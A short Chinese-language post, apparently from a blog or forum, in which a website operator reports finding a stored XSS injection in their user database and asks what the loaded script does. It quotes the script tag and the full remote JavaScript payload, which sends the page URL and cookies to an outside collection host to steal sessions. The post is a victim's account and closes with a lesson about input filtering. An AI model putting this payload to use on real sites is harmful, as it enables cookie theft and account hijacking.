运营了一个网站,今天突然后台用户列表打开只有一条记录,还是半截。直觉告诉是字段出了问题,数据库查看一下这条记录的字段,一看下了一跳,竟然是js 注入攻击
<sCRiPt/SrC=//baidu.xiaoxiaowu.me/Jg3G>
这段代码链接到了一个js文件,不知道这个文件的作用,有谁知道告诉一下。
(function() { (new Image()).src = 'http://xss.azwines.com.cn/xss.php?do=api&id=Jg3G&location=' + escape((function() {
try {
return document.location.href
} catch(e) {
return ''
}
})()) + '&toplocation=' + escape((function() {
try {
return top.location.href
} catch(e) {
return ''
}
})()) + '&cookie=' + escape((function() {
try {
return document.cookie
} catch(e) {
return ''
}
})()) + '&opener=' + escape((function() {
try {
return (window.opener && window.opener.location.href) ? window.opener.location.href: ''
} catch(e) {
return ''
}
})());
})();
if ('1' == 1) {
keep = new Image();
keep.src = 'http://xss.azwines.com.cn/xss.php?do=keepsession&id=Jg3G&url=' + escape(document.location) + '&cookie=' + escape(document.cookie)
};
看来过滤用户的输入非常重要,这虽然没有攻击成功,但是给了我一个严重的教训。